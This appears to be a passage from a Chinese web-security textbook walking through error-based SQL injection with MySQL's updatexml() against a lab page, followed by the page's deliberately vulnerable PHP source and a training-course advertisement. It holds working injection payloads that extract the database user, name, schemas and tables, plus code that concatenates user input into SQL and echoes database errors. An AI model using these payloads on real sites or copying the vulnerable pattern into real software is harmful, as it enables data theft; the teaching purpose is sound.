最新报错注入攻击和代码分析技术

报错注入攻击

报错注入攻击的测试地址在本书第2章。

先访问error.php?username=1'，因为参数username的值是1'。在数据库中执行SQL时，会因为多了一个单引号而报错，输出到页面的结果如图4-35所示。

  

 

图4-35  

 

通过页面返回结果可以看出，程序直接将错误信息输出到了页面上，所以此处可以利用报错注入获取数据。报错注入有多种利用方式，此处只讲解利用MySQL函数updatexml()获取user()的值，SQL语句如下：

1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

其中0x7e是ASCII编码，解码结果为~，如图4-36所示。 

 

 

图4-36

 

然后尝试获取当前数据库的库名，语句如下：

1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

得到的结果如图4-37所示。

 

 

图4-37  

 

接着可以利用select语句继续获取数据库中的库名、表名和字段名，查询语句与Union注入的查询语句相同。因为报错注入只显示一条结果，所以需要使用limit语句。构造的语句如下：

1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+

结果如图4-38所示，可以获取数据库的库名。

 

 

图4-38  

 

构造查询表名的语句如下：

1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema= 'test' limit 0,1),0x7e),1)--+

如图4-39所示，可以获取数据库test的表名。

 

 

图4-39

 

报错注入代码分析

在报错注入页面，程序获取GET参数username后，将username拼接到SQL语句中，然后到数据库查询。如果执行成功，就输出ok；如果出错，则通过echo mysqli_error($con)将错误信息输出到页面（mysqli_error返回上一个MySQL函数的错误），代码如下：

<?php$con=mysqli_connect("localhost","root","123456","test");if (mysqli_connect_errno()){echo "连接失败: " . mysqli_connect_error();}$username = $_GET['username'];if($result = mysqli_query($con,"select * from users where `username`='".$username."'")){echo "ok";}else{echo mysqli_error($con);}?> 

输入username=1'时，SQL语句为select * from users where `username`='1''。执行时，会因为多了一个单引号而报错。利用这种错误回显，可以通过floor()、updatexml()等函数将要查询的内容输出到页面上。

 

 

 

Ms08067安全实验室专注于网络安全知识的普及和培训，是专业的“图书出版+培训”的网络安全在线教育平台，专注于网络安全领域中高端人才培养。

 

平台已开设Web安全零基础就业，Web高级安全攻防进阶，红队实战攻防特训，Java代码安全审计，恶意代码分析与免杀实战，CTF基础实战特训营，网络安全应急响应，安全工具开发，AI与网络安全等系统培训课程。实验室出版安全图书《Web安全攻防：渗透测试实战指南》、《内网安全攻防：渗透测试实战指南》、《Python安全攻防：渗透测试实战指南》、《Java代码审计：入门篇》等。

 

扫描客服微信 获取更多课件+学习资料